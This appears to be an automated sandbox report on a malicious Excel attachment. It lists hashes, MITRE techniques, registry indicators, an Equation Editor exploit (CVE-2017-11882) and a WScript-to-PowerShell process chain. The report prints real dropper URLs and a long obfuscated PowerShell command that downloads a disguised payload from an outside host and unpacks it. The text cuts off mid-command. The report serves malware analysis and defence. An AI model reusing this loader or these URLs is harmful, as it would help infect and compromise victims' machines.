9d5316038e869e6de1069cd0579e7e78f2a36f526bc3275ee67fe787ae7e6ea3

Analysis

max time kernel
113s
max time network
114s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
21-08-2024 11:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQTLPO2414.xls
Size

370KB
MD5

9b2f48677d72f952d32113a2656534c9
SHA1

557f90e41483f5dac7f42acabfad8a6b96b49422
SHA256

9d5316038e869e6de1069cd0579e7e78f2a36f526bc3275ee67fe787ae7e6ea3
SHA512

4f2de924ccc32b25c175fabd3b148e227cd731708c446ffb9f7d00ff54b435faea464b2b3a98a5f183c2338972dc60bea3cd24154fd5bd69e226a7094dbaa1ea
SSDEEP

6144:Rlp+aufDHYN/5MXBoyP3wqohOt4KnOFYnITzFnpM6zJAbpvjlhfEC:RlKfu5G43LnB66z2bpv4C

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	2780	EQNEDT32.EXE
17	2084	powershell.exe
18	2084	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2360	powershell.exe
2084	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Office\Common\Offline\Files\https://jamp.to/9PfDSq	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2780	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1644	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2360	powershell.exe
2084	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeShutdownPrivilege	3020	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1644	EXCEL.EXE
1644	EXCEL.EXE
1644	EXCEL.EXE
3020	WINWORD.EXE
3020	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2256	2780	EQNEDT32.EXE	34
PID 2780 wrote to memory of 2256	2780	EQNEDT32.EXE	34
PID 2780 wrote to memory of 2256	2780	EQNEDT32.EXE	34
PID 2780 wrote to memory of 2256	2780	EQNEDT32.EXE	34
PID 3020 wrote to memory of 2204	3020	WINWORD.EXE	35
PID 3020 wrote to memory of 2204	3020	WINWORD.EXE	35
PID 3020 wrote to memory of 2204	3020	WINWORD.EXE	35
PID 3020 wrote to memory of 2204	3020	WINWORD.EXE	35
PID 2256 wrote to memory of 2360	2256	WScript.exe	36
PID 2256 wrote to memory of 2360	2256	WScript.exe	36
PID 2256 wrote to memory of 2360	2256	WScript.exe	36
PID 2256 wrote to memory of 2360	2256	WScript.exe	36
PID 2360 wrote to memory of 2084	2360	powershell.exe	38
PID 2360 wrote to memory of 2084	2360	powershell.exe	38
PID 2360 wrote to memory of 2084	2360	powershell.exe	38
PID 2360 wrote to memory of 2084	2360	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQTLPO2414.xls
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1644

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2204

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\yummysweetbutterbunlipsonhe.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2256
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫YQBn∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫VQBy∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫9∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫JwBo∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bw∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫Og∵ ㎣ ⇍ ⟂ ⤫v∵ ㎣ ⇍ ⟂ ⤫C8∵ ㎣ ⇍ ⟂ ⤫aQBh∵ ㎣ ⇍ ⟂ ⤫Dg∵ ㎣ ⇍ ⟂ ⤫M∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫z∵ ㎣ ⇍ ⟂ ⤫DE∵ ㎣ ⇍ ⟂ ⤫M∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫0∵ ㎣ ⇍ ⟂ ⤫C4∵ ㎣ ⇍ ⟂ ⤫dQBz∵ ㎣ ⇍ ⟂ ⤫C4∵ ㎣ ⇍ ⟂ ⤫YQBy∵ ㎣ ⇍ ⟂ ⤫GM∵ ㎣ ⇍ ⟂ ⤫a∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫HY∵ ㎣ ⇍ ⟂ ⤫ZQ∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫G8∵ ㎣ ⇍ ⟂ ⤫cgBn∵ ㎣ ⇍ ⟂ ⤫C8∵ ㎣ ⇍ ⟂ ⤫Mg∵ ㎣ ⇍ ⟂ ⤫3∵ ㎣ ⇍ ⟂ ⤫C8∵ ㎣ ⇍ ⟂ ⤫aQB0∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫bQBz∵ ㎣ ⇍ ⟂ ⤫C8∵ ㎣ ⇍ ⟂ ⤫dgBi∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫Xw∵ ㎣ ⇍ ⟂ ⤫y∵ ㎣ ⇍ ⟂ ⤫D∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫Mg∵ ㎣ ⇍ ⟂ ⤫0∵ ㎣ ⇍ ⟂ ⤫D∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫Nw∵ ㎣ ⇍ ⟂ ⤫y∵ ㎣ ⇍ ⟂ ⤫DY∵ ㎣ ⇍ ⟂ ⤫Xw∵ ㎣ ⇍ ⟂ ⤫y∵ ㎣ ⇍ ⟂ ⤫D∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫Mg∵ ㎣ ⇍ ⟂ ⤫0∵ ㎣ ⇍ ⟂ ⤫D∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫Nw∵ ㎣ ⇍ ⟂ ⤫y∵ ㎣ ⇍ ⟂ ⤫DY∵ ㎣ ⇍ ⟂ ⤫LwB2∵ ㎣ ⇍ ⟂ ⤫GI∵ ㎣ ⇍ ⟂ ⤫cw∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫Go∵ ㎣ ⇍ ⟂ ⤫c∵ ㎣ ⇍ ⟂ ⤫Bn∵ ㎣ ⇍ ⟂ ⤫Cc∵ ㎣ ⇍ ⟂ ⤫Ow∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫Hc∵ ㎣ ⇍ ⟂ ⤫ZQBi∵ ㎣ ⇍ ⟂ ⤫EM∵ ㎣ ⇍ ⟂ ⤫b∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫bgB0∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫PQ∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫E4∵ ㎣ ⇍ ⟂ ⤫ZQB3∵ ㎣ ⇍ ⟂ ⤫C0∵ ㎣ ⇍ ⟂ ⤫TwBi∵ ㎣ ⇍ ⟂ ⤫Go∵ ㎣ ⇍ ⟂ ⤫ZQBj∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫BT∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫cwB0∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫bQ∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫E4∵ ㎣ ⇍ ⟂ ⤫ZQB0∵ ㎣ ⇍ ⟂ ⤫C4∵ ㎣ ⇍ ⟂ ⤫VwBl∵ ㎣ ⇍ ⟂ ⤫GI∵ ㎣ ⇍ ⟂ ⤫QwBs∵ ㎣ ⇍ ⟂ ⤫Gk∵ ㎣ ⇍ ⟂ ⤫ZQBu∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫Ow∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫Gk∵ ㎣ ⇍ ⟂ ⤫bQBh∵ ㎣ ⇍ ⟂ ⤫Gc∵ ㎣ ⇍ ⟂ ⤫ZQBC∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫9∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫J∵ ㎣ ⇍ ⟂ ⤫B3∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫YgBD∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫aQBl∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫EQ∵ ㎣ ⇍ ⟂ ⤫bwB3∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫b∵ ㎣ ⇍ ⟂ ⤫Bv∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫BE∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bh∵ ㎣ ⇍ ⟂ ⤫Cg∵ ㎣ ⇍ ⟂ ⤫J∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫YQBn∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫VQBy∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫KQ∵ ㎣ ⇍ ⟂ ⤫7∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫aQBt∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫ZwBl∵ ㎣ ⇍ ⟂ ⤫FQ∵ ㎣ ⇍ ⟂ ⤫ZQB4∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫9∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫WwBT∵ ㎣ ⇍ ⟂ ⤫Hk∵ ㎣ ⇍ ⟂ ⤫cwB0∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫bQ∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫FQ∵ ㎣ ⇍ ⟂ ⤫ZQB4∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫LgBF∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫YwBv∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫aQBu∵ ㎣ ⇍ ⟂ ⤫Gc∵ ㎣ ⇍ ⟂ ⤫XQ∵ ㎣ ⇍ ⟂ ⤫6∵ ㎣ ⇍ ⟂ ⤫Do∵ ㎣ ⇍ ⟂ ⤫VQBU∵ ㎣ ⇍ ⟂ ⤫EY∵ ㎣ ⇍ ⟂ ⤫O∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫Ec∵ ㎣ ⇍ ⟂ ⤫ZQB0∵ ㎣ ⇍ ⟂ ⤫FM∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫By∵ ㎣ ⇍ ⟂ ⤫Gk∵ ㎣ ⇍ ⟂ ⤫bgBn∵ ㎣ ⇍ ⟂ ⤫Cg∵ ㎣ ⇍ ⟂ ⤫J∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫YQBn∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫QgB5∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫ZQBz∵ ㎣ ⇍ ⟂ ⤫Ck∵ ㎣ ⇍ ⟂ ⤫Ow∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bh∵ ㎣ ⇍ ⟂ ⤫HI∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫BG∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫YQBn∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫PQ∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫Cc∵ ㎣ ⇍ ⟂ ⤫P∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫8∵ ㎣ ⇍ ⟂ ⤫EI∵ ㎣ ⇍ ⟂ ⤫QQBT∵ ㎣ ⇍ ⟂ ⤫EU∵ ㎣ ⇍ ⟂ ⤫Ng∵ ㎣ ⇍ ⟂ ⤫0∵ ㎣ ⇍ ⟂ ⤫F8∵ ㎣ ⇍ ⟂ ⤫UwBU∵ ㎣ ⇍ ⟂ ⤫EE∵ ㎣ ⇍ ⟂ ⤫UgBU∵ ㎣ ⇍ ⟂ ⤫D4∵ ㎣ ⇍ ⟂ ⤫Pg∵ ㎣ ⇍ ⟂ ⤫n∵ ㎣ ⇍ ⟂ ⤫Ds∵ ㎣ ⇍ ⟂ ⤫J∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫BG∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫YQBn∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫PQ∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫Cc∵ ㎣ ⇍ ⟂ ⤫P∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫8∵ ㎣ ⇍ ⟂ ⤫EI∵ ㎣ ⇍ ⟂ ⤫QQBT∵ ㎣ ⇍ ⟂ ⤫EU∵ ㎣ ⇍ ⟂ ⤫Ng∵ ㎣ ⇍ ⟂ ⤫0∵ ㎣ ⇍ ⟂ ⤫F8∵ ㎣ ⇍ ⟂ ⤫RQBO∵ ㎣ ⇍ ⟂ ⤫EQ∵ ㎣ ⇍ ⟂ ⤫Pg∵ ㎣ ⇍ ⟂ ⤫+∵ ㎣ ⇍ ⟂ ⤫Cc∵ ㎣ ⇍ ⟂ ⤫Ow∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bh∵ ㎣ ⇍ ⟂ ⤫HI∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫BJ∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫Hg∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫9∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫J∵ ㎣ ⇍ ⟂ ⤫Bp∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ ⇍ ⟂ ⤫YQBn∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫V∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫Hg∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫u∵ ㎣ ⇍ ⟂ ⤫Ek∵ ㎣ ⇍ ⟂ ⤫bgBk∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫e∵ ㎣ ⇍ ⟂ ⤫BP∵ ㎣ ⇍ ⟂ ⤫GY∵ ㎣ ⇍ ⟂ ⤫K∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bh∵ ㎣ ⇍ ⟂ ⤫HI∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫BG∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫YQBn∵ ㎣ ⇍ ⟂ ⤫Ck∵ ㎣ ⇍ ⟂ ⤫Ow∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫bgBk∵ ㎣ ⇍ ⟂ ⤫Ek∵ ㎣ ⇍ ⟂ ⤫bgBk∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫e∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫D0∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫Gk∵ ㎣ ⇍ ⟂ ⤫bQBh∵ ㎣ ⇍ ⟂ ⤫Gc∵ ㎣ ⇍ ⟂ ⤫ZQBU∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫e∵ ㎣ ⇍ ⟂ ⤫B0∵ ㎣ ⇍ ⟂ ⤫C4∵ ㎣ ⇍ ⟂ ⤫SQBu∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫ZQB4∵ ㎣ ⇍ ⟂ ⤫E8∵ ㎣ ⇍ ⟂ ⤫Zg∵ ㎣ ⇍ ⟂ ⤫o∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫ZQBu∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫RgBs∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫Zw∵ ㎣ ⇍ ⟂ ⤫p∵ ㎣ ⇍ ⟂ ⤫Ds∵ ㎣ ⇍ ⟂ ⤫J∵ ㎣ ⇍ ⟂ ⤫Bz∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫YQBy∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫SQBu∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫ZQB4∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫LQBn∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫w∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫LQBh∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫ZQBu∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫SQBu∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫ZQB4∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫LQBn∵ ㎣ ⇍ ⟂ ⤫HQ∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bh∵ ㎣ ⇍ ⟂ ⤫HI∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫BJ∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫Hg∵ ㎣ ⇍ ⟂ ⤫Ow∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bh∵ ㎣ ⇍ ⟂ ⤫HI∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫BJ∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫Z∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫Hg∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫r∵ ㎣ ⇍ ⟂ ⤫D0∵ ㎣ ⇍ ⟂ ⤫I∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bh∵ ㎣ ⇍ ⟂ ⤫HI∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫BG∵ ㎣ ⇍ ⟂ ⤫Gw∵ ㎣ ⇍ ⟂ ⤫YQBn∵ ㎣ ⇍ ⟂ ⤫C4∵ ㎣ ⇍ ⟂ ⤫T∵ ㎣ ⇍ ⟂ ⤫Bl∵ ㎣ ⇍ ⟂ ⤫G4∵ ㎣ ⇍ ⟂ ⤫ZwB0∵ ㎣ ⇍ ⟂ ⤫Gg∵ ㎣ ⇍ ⟂ ⤫Ow∵ ㎣ ⇍ ⟂ ⤫k∵ ㎣ ⇍ ⟂ ⤫GI∵ ㎣ ⇍ ⟂ ⤫YQBz∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫Ng∵ ㎣ ⇍ ⟂ ⤫0∵ ㎣ ⇍ ⟂ ⤫Ew∵ ㎣ ⇍ ⟂ ⤫ZQBu∵ ㎣ ⇍ ⟂ ⤫Gc∵ ㎣ ⇍ ⟂ ⤫d∵ ㎣ ⇍ ⟂ ⤫Bo∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫PQ∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫ZQBu∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫SQBu∵ ㎣ ⇍ ⟂ ⤫GQ∵ ㎣ ⇍ ⟂ ⤫ZQB4∵ ㎣ ⇍ ⟂ ⤫C∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫LQ∵ ㎣ ⇍ ⟂ ⤫g∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫cwB0∵ ㎣ ⇍ ⟂ ⤫GE∵ ㎣ ⇍ ⟂ ⤫cgB0∵ ㎣ ⇍ ⟂ ⤫Ek∵ ㎣ ⇍ ⟂ ⤫bgBk∵ ㎣ ⇍ ⟂ ⤫GU∵ ㎣ ⇍ ⟂ ⤫e∵ ㎣ ⇍ ⟂ ⤫∵ ㎣ ⇍ ⟂ ⤫7∵ ㎣ ⇍ ⟂ ⤫CQ∵ ㎣ ⇍ ⟂ ⤫YgBh∵ ㎣ ⇍ ⟂ ⤫HM∵ ㎣ ⇍ ⟂ ⤫ZQ∵ ㎣ ⇍ ⟂ ⤫2∵ ㎣ ⇍ ⟂ ⤫DQ∵ ㎣ ⇍ ⟂ ⤫QwBv∵ ㎣ ⇍ ⟂ ⤫G0∵ ㎣ 